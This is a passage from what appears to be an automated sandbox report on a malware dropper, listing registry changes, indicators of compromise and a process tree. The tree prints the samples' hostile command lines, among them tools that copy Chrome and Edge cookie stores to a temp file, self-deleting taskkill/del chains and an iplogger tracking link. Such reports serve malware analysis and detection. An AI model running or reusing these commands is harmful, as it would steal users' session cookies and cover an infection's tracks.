Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\ClearBrowsingHistoryOnStart = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\SharedCookie_MRACMigrationDone = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" 
MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance Process not Found Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage MicrosoftEdge.exe Key created 
\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache MicrosoftEdgeCP.exe -
description       ioc                                                                                                                                                     Process
Key created       \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349                                   sonia_3.exe
Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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  sonia_3.exe
NTFS ADS 2 IoCs
description                   ioc                                                  Process
File created                  C:\ProgramData\BNKIBJUQX4H2CQ2R.exe:Zone.Identifier  D880.exe
File opened for modification  C:\ProgramData\BNKIBJUQX4H2CQ2R.exe:Zone.Identifier  D880.exe
Runs .reg file with regedit 2 IoCs
pid   Process
5956  regedit.exe
4464  regedit.exe
Runs ping.exe 1 TTPs 2 IoCs
pid   Process
4328  PING.EXE
4992  PING.EXE
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3952 sonia_2.exe 3952 sonia_2.exe 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe 4092 svchost.exe 4092 svchost.exe 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 4252 WerFault.exe 4252 WerFault.exe 4252 WerFault.exe 4252 WerFault.exe 4252 WerFault.exe 4252 WerFault.exe 4252 WerFault.exe 4252 WerFault.exe 4252 WerFault.exe 4252 WerFault.exe 4252 WerFault.exe 4252 WerFault.exe 4252 WerFault.exe 4252 WerFault.exe 3048 Process not Found 3048 Process not Found 4252 WerFault.exe 4252 WerFault.exe 4252 WerFault.exe 3048 Process not Found 3048 Process not Found 4252 WerFault.exe 4252 WerFault.exe 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found 3048 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid   Process
3048  Process not Found
Suspicious behavior: MapViewOfSection 6 IoCs
pid   Process
3952  sonia_2.exe
208   huratfj
4480  Acre.exe.com
3496  Acre.exe.com
6120  huratfj
5228  huratfj
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2840 sonia_4.exe Token: SeDebugPrivilege 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe Token: SeDebugPrivilege 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe Token: SeDebugPrivilege 4092 svchost.exe Token: SeDebugPrivilege 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe Token: SeDebugPrivilege 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe Token: SeDebugPrivilege 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe Token: SeDebugPrivilege 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe Token: SeDebugPrivilege 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe Token: SeDebugPrivilege 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe Token: SeDebugPrivilege 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe Token: SeDebugPrivilege 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe Token: SeDebugPrivilege 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe Token: SeDebugPrivilege 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe Token: SeDebugPrivilege 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe Token: SeAuditPrivilege 2380 svchost.exe Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeDebugPrivilege 4252 WerFault.exe Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not 
Found Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeRestorePrivilege 4740 WerFault.exe Token: SeBackupPrivilege 4740 WerFault.exe Token: SeBackupPrivilege 4740 WerFault.exe Token: SeDebugPrivilege 4740 WerFault.exe Token: SeDebugPrivilege 2288 WerFault.exe Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeDebugPrivilege 4412 WerFault.exe Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeDebugPrivilege 4300 WerFault.exe Token: SeDebugPrivilege 4272 taskkill.exe Token: SeDebugPrivilege 4260 WerFault.exe Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeShutdownPrivilege 3048 Process not Found Token: SeCreatePagefilePrivilege 3048 Process not Found Token: SeDebugPrivilege 4972 OLKbrowser.exe Token: SeShutdownPrivilege 3048 Process not Found -
Suspicious use of FindShellTrayWindow 2 IoCs
pid   Process
3048  Process not Found
3048  Process not Found
Suspicious use of SetWindowsHookEx 4 IoCs
pid   Process
3048  Process not Found
5156  MicrosoftEdge.exe
5576  MicrosoftEdgeCP.exe
5576  MicrosoftEdgeCP.exe
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2208 wrote to memory of 2836 2208 8 (30).exe 76 PID 2208 wrote to memory of 2836 2208 8 (30).exe 76 PID 2208 wrote to memory of 2836 2208 8 (30).exe 76 PID 2836 wrote to memory of 4032 2836 setup_installer.exe 77 PID 2836 wrote to memory of 4032 2836 setup_installer.exe 77 PID 2836 wrote to memory of 4032 2836 setup_installer.exe 77 PID 4032 wrote to memory of 3568 4032 setup_install.exe 118 PID 4032 wrote to memory of 3568 4032 setup_install.exe 118 PID 4032 wrote to memory of 3568 4032 setup_install.exe 118 PID 4032 wrote to memory of 500 4032 setup_install.exe 80 PID 4032 wrote to memory of 500 4032 setup_install.exe 80 PID 4032 wrote to memory of 500 4032 setup_install.exe 80 PID 4032 wrote to memory of 1256 4032 setup_install.exe 81 PID 4032 wrote to memory of 1256 4032 setup_install.exe 81 PID 4032 wrote to memory of 1256 4032 setup_install.exe 81 PID 4032 wrote to memory of 2072 4032 setup_install.exe 93 PID 4032 wrote to memory of 2072 4032 setup_install.exe 93 PID 4032 wrote to memory of 2072 4032 setup_install.exe 93 PID 4032 wrote to memory of 2140 4032 setup_install.exe 82 PID 4032 wrote to memory of 2140 4032 setup_install.exe 82 PID 4032 wrote to memory of 2140 4032 setup_install.exe 82 PID 4032 wrote to memory of 4076 4032 setup_install.exe 83 PID 4032 wrote to memory of 4076 4032 setup_install.exe 83 PID 4032 wrote to memory of 4076 4032 setup_install.exe 83 PID 4032 wrote to memory of 1172 4032 setup_install.exe 84 PID 4032 wrote to memory of 1172 4032 setup_install.exe 84 PID 4032 wrote to memory of 1172 4032 setup_install.exe 84 PID 3568 wrote to memory of 2084 3568 kGPLQ7M8fqAHElYq3fSV5UnL.exe 85 PID 3568 wrote to memory of 2084 3568 kGPLQ7M8fqAHElYq3fSV5UnL.exe 85 PID 3568 wrote to memory of 2084 3568 kGPLQ7M8fqAHElYq3fSV5UnL.exe 85 PID 1256 wrote to memory of 1436 1256 cmd.exe 86 PID 1256 wrote to memory of 1436 1256 cmd.exe 86 PID 1256 wrote to memory of 1436 1256 cmd.exe 86 PID 500 wrote to memory of 
3952 500 cmd.exe 87 PID 500 wrote to memory of 3952 500 cmd.exe 87 PID 500 wrote to memory of 3952 500 cmd.exe 87 PID 4076 wrote to memory of 1120 4076 cmd.exe 92 PID 4076 wrote to memory of 1120 4076 cmd.exe 92 PID 4076 wrote to memory of 1120 4076 cmd.exe 92 PID 2072 wrote to memory of 2840 2072 cmd.exe 88 PID 2072 wrote to memory of 2840 2072 cmd.exe 88 PID 2140 wrote to memory of 3960 2140 cmd.exe 89 PID 2140 wrote to memory of 3960 2140 cmd.exe 89 PID 2140 wrote to memory of 3960 2140 cmd.exe 89 PID 2084 wrote to memory of 4016 2084 sonia_1.exe 99 PID 2084 wrote to memory of 4016 2084 sonia_1.exe 99 PID 2084 wrote to memory of 4016 2084 sonia_1.exe 99 PID 2840 wrote to memory of 3660 2840 sonia_4.exe 150 PID 2840 wrote to memory of 3660 2840 sonia_4.exe 150 PID 2840 wrote to memory of 3660 2840 sonia_4.exe 150 PID 1684 wrote to memory of 3860 1684 Process not Found 138 PID 1684 wrote to memory of 3860 1684 Process not Found 138 PID 1684 wrote to memory of 3860 1684 Process not Found 138 PID 3860 wrote to memory of 4092 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe 70 PID 3860 wrote to memory of 2604 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe 18 PID 4092 wrote to memory of 4016 4092 svchost.exe 99 PID 4092 wrote to memory of 4016 4092 svchost.exe 99 PID 4092 wrote to memory of 4016 4092 svchost.exe 99 PID 3660 wrote to memory of 4120 3660 explorer.exe 106 PID 3660 wrote to memory of 4120 3660 explorer.exe 106 PID 3660 wrote to memory of 4120 3660 explorer.exe 106 PID 3860 wrote to memory of 996 3860 uPzycWHt5eiu5PHtDDY4fwTI.exe 54 PID 3660 wrote to memory of 4192 3660 explorer.exe 105 PID 3660 wrote to memory of 4192 3660 explorer.exe 105
Processes
- c:\windows\system32\svchost.exe (PID:2724), command line: c:\windows\system32\svchost.exe -k netsvcs -s WpnService
- c:\windows\system32\svchost.exe (PID:2712), command line: c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
- c:\windows\system32\svchost.exe (PID:2604), command line: c:\windows\system32\svchost.exe -k netsvcs -s Browser
- c:\windows\system32\svchost.exe (PID:2380), command line: c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
  - Suspicious use of AdjustPrivilegeToken
- c:\windows\system32\svchost.exe (PID:2368), command line: c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
- c:\windows\system32\svchost.exe (PID:1924), command line: c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
- c:\windows\system32\svchost.exe (PID:1380), command line: c:\windows\system32\svchost.exe -k netsvcs -s SENS
- c:\windows\system32\svchost.exe (PID:1368), command line: c:\windows\system32\svchost.exe -k netsvcs -s UserManager
- c:\windows\system32\svchost.exe (PID:1164), command line: c:\windows\system32\svchost.exe -k netsvcs -s Themes
- c:\windows\system32\svchost.exe (PID:1112), command line: c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
  - Modifies registry class
- c:\windows\system32\svchost.exe (PID:344), command line: c:\windows\system32\svchost.exe -k netsvcs -s Schedule
  - Drops file in System32 directory
  - C:\Users\Admin\AppData\Roaming\huratfj (PID:208), command line: C:\Users\Admin\AppData\Roaming\huratfj
    - Loads dropped DLL
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
  - C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exe (PID:7324), command line: C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exe --Task
    - Suspicious use of SetThreadContext
    - C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exe (PID:496), command line: C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exe --Task
  - C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exe (PID:5300), command line: C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exe --Task
    - Suspicious use of SetThreadContext
    - C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exe (PID:6952), command line: C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exe --Task
  - C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exe (PID:6180), command line: C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exe --Task
    - Suspicious use of SetThreadContext
    - C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exe (PID:4944), command line: C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exe --Task
  - C:\Users\Admin\AppData\Roaming\huratfj (PID:6120), command line: C:\Users\Admin\AppData\Roaming\huratfj
    - Loads dropped DLL
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
  - C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exe (PID:5116), command line: C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exe --Task
    - Suspicious use of SetThreadContext
    - C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exe (PID:7572), command line: C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exe --Task
  - C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exe (PID:5568), command line: C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exe --Task
    - Suspicious use of SetThreadContext
    - C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exe (PID:5692), command line: C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exe --Task
  - C:\Users\Admin\AppData\Roaming\huratfj (PID:5228), command line: C:\Users\Admin\AppData\Roaming\huratfj
    - Loads dropped DLL
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exeC:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exe --Task2⤵
- Suspicious use of SetThreadContext
PID:7576 -
C:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exeC:\Users\Admin\AppData\Local\22319f0f-b268-4e77-a6c3-67b2eaa72a32\9E06.exe --Task3⤵PID:5164
-
-
-
[1] PID:2208  "C:\Users\Admin\AppData\Local\Temp\8 (30).exe"
    - Suspicious use of WriteProcessMemory
  [2] PID:2836  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
    [3] PID:4032  "C:\Users\Admin\AppData\Local\Temp\7zS41B68F14\setup_install.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory
      [4] PID:500  C:\Windows\system32\cmd.exe /c sonia_2.exe  (image: C:\Windows\SysWOW64\cmd.exe)
          - Suspicious use of WriteProcessMemory
        [5] PID:3952  sonia_2.exe  (image: C:\Users\Admin\AppData\Local\Temp\7zS41B68F14\sonia_2.exe)
            - Executes dropped EXE
            - Loads dropped DLL
            - Checks SCSI registry key(s)
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious behavior: MapViewOfSection
      [4] PID:1256  C:\Windows\system32\cmd.exe /c sonia_3.exe  (image: C:\Windows\SysWOW64\cmd.exe)
          - Suspicious use of WriteProcessMemory
        [5] PID:1436  sonia_3.exe  (image: C:\Users\Admin\AppData\Local\Temp\7zS41B68F14\sonia_3.exe)
            - Executes dropped EXE
            - Loads dropped DLL
            - Checks processor information in registry
            - Modifies system certificate store
          [6] PID:4744  "C:\Windows\System32\cmd.exe" /c taskkill /im sonia_3.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS41B68F14\sonia_3.exe" & del C:\ProgramData\*.dll & exit  (image: C:\Windows\SysWOW64\cmd.exe)
            [7] PID:4272  taskkill /im sonia_3.exe /f  (image: C:\Windows\SysWOW64\taskkill.exe)
                - Kills process with taskkill
                - Suspicious use of AdjustPrivilegeToken
            [7] PID:3516  timeout /t 6  (image: C:\Windows\SysWOW64\timeout.exe)
                - Delays execution with timeout.exe
      [4] PID:2140  C:\Windows\system32\cmd.exe /c sonia_5.exe  (image: C:\Windows\SysWOW64\cmd.exe)
          - Suspicious use of WriteProcessMemory
        [5] PID:3960  sonia_5.exe  (image: C:\Users\Admin\AppData\Local\Temp\7zS41B68F14\sonia_5.exe)
            - Executes dropped EXE
            - Checks computer location settings
          [6] PID:3568  "C:\Users\Admin\Documents\kGPLQ7M8fqAHElYq3fSV5UnL.exe"
              - Suspicious use of WriteProcessMemory
            [7] PID:5148  C:\Users\Admin\Documents\kGPLQ7M8fqAHElYq3fSV5UnL.exe
                - Executes dropped EXE
            [7] PID:2216  C:\Users\Admin\Documents\kGPLQ7M8fqAHElYq3fSV5UnL.exe
                - Executes dropped EXE
                - Loads dropped DLL
                - Checks processor information in registry
              [8] PID:6528  "C:\Windows\System32\cmd.exe" /c taskkill /im kGPLQ7M8fqAHElYq3fSV5UnL.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\kGPLQ7M8fqAHElYq3fSV5UnL.exe" & del C:\ProgramData\*.dll & exit  (image: C:\Windows\SysWOW64\cmd.exe)
                  - Loads dropped DLL
                [9] PID:1256  taskkill /im kGPLQ7M8fqAHElYq3fSV5UnL.exe /f  (image: C:\Windows\SysWOW64\taskkill.exe)
                    - Kills process with taskkill
                [9] PID:7828  timeout /t 6  (image: C:\Windows\SysWOW64\timeout.exe)
                    - Delays execution with timeout.exe
          [6] PID:4936  "C:\Users\Admin\Documents\jSdaT5nE0b8JDQ5TWF1Gy4dL.exe"
              - Executes dropped EXE
              - Suspicious use of SetThreadContext
            [7] PID:3880  C:\Users\Admin\Documents\jSdaT5nE0b8JDQ5TWF1Gy4dL.exe
                - Executes dropped EXE
          [6] PID:416  "C:\Users\Admin\Documents\VkpE1gRngNXFU0Cn05vHerv0.exe"
              - Executes dropped EXE
            [7] PID:4600  "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp  (image: C:\Windows\SysWOW64\cmd.exe)
              [8] PID:4664  cmd  (image: C:\Windows\SysWOW64\cmd.exe)
                [9] PID:4392  findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp  (image: C:\Windows\SysWOW64\findstr.exe)
                [9] PID:4164  Acre.exe.com k  (image: C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com)
                    - Executes dropped EXE
                  [10] PID:4480  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                      - Executes dropped EXE
                      - Drops startup file
                      - Suspicious use of SetThreadContext
                      - Suspicious behavior: MapViewOfSection
                    [11] PID:6728  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                [9] PID:4328  ping 127.0.0.1 -n 30  (image: C:\Windows\SysWOW64\PING.EXE)
                    - Runs ping.exe
          [6] PID:4616  "C:\Users\Admin\Documents\ACiNVstKWjR5KeuROoPr2s5O.exe"
              - Executes dropped EXE
              - Suspicious use of SetThreadContext
            [7] PID:3400  C:\Users\Admin\Documents\ACiNVstKWjR5KeuROoPr2s5O.exe
                - Executes dropped EXE
            [7] PID:500  C:\Users\Admin\Documents\ACiNVstKWjR5KeuROoPr2s5O.exe
                - Executes dropped EXE
          [6] PID:3860  "C:\Users\Admin\Documents\uPzycWHt5eiu5PHtDDY4fwTI.exe"
              - Executes dropped EXE
              - Loads dropped DLL
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
              - Suspicious use of WriteProcessMemory
            [7] PID:6544  C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            [7] PID:7100  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            [7] PID:7472  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            [7] PID:7900  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            [7] PID:6960  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            [7] PID:5252  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
          [6] PID:4012  "C:\Users\Admin\Documents\wa5IqaoARMeCfzk5EGmIb5Jc.exe"
              - Executes dropped EXE
              - Drops file in Program Files directory
            [7] PID:2200  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat" "  (image: C:\Windows\SysWOW64\cmd.exe)
              [8] PID:3660  explorer https://iplogger.org/2LBCU6  (image: C:\Windows\SysWOW64\explorer.exe)
                  - Executes dropped EXE
                  - Suspicious use of WriteProcessMemory
              [8] PID:5956  regedit /s adj.reg  (image: C:\Windows\SysWOW64\regedit.exe)
                  - Runs .reg file with regedit
              [8] PID:4464  regedit /s adj2.reg  (image: C:\Windows\SysWOW64\regedit.exe)
                  - Runs .reg file with regedit
            [7] PID:4384  "C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"
                - Executes dropped EXE
          [6] PID:4104  "C:\Users\Admin\Documents\rJhZg0bwisK5bP7bLxUHp2lu.exe"
              - Executes dropped EXE
              - Checks BIOS information in registry
              - Checks whether UAC is enabled
              - Suspicious use of NtSetInformationThreadHideFromDebugger
            [7] PID:7616  C:\Users\Admin\AppData\Roaming\1234.exe 1234
                - Suspicious use of SetThreadContext
              [8] PID:6712  "{path}"  (image: C:\Users\Admin\AppData\Roaming\1234.exe)
          [6] PID:5144  "C:\Users\Admin\Documents\7jiLTiYSFXtwlgQxL3sEkMT6.exe"
              - Executes dropped EXE
            [7] PID:5516  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                - Executes dropped EXE
              [8] PID:5712  "C:\Users\Admin\AppData\Local\Temp\7zSC85C94F4\setup_install.exe"
                  - Executes dropped EXE
                  - Loads dropped DLL
                [9] PID:5920  C:\Windows\system32\cmd.exe /c karotima_2.exe  (image: C:\Windows\SysWOW64\cmd.exe)
                  [10] PID:6024  karotima_2.exe  (image: C:\Users\Admin\AppData\Local\Temp\7zSC85C94F4\karotima_2.exe)
                      - Executes dropped EXE
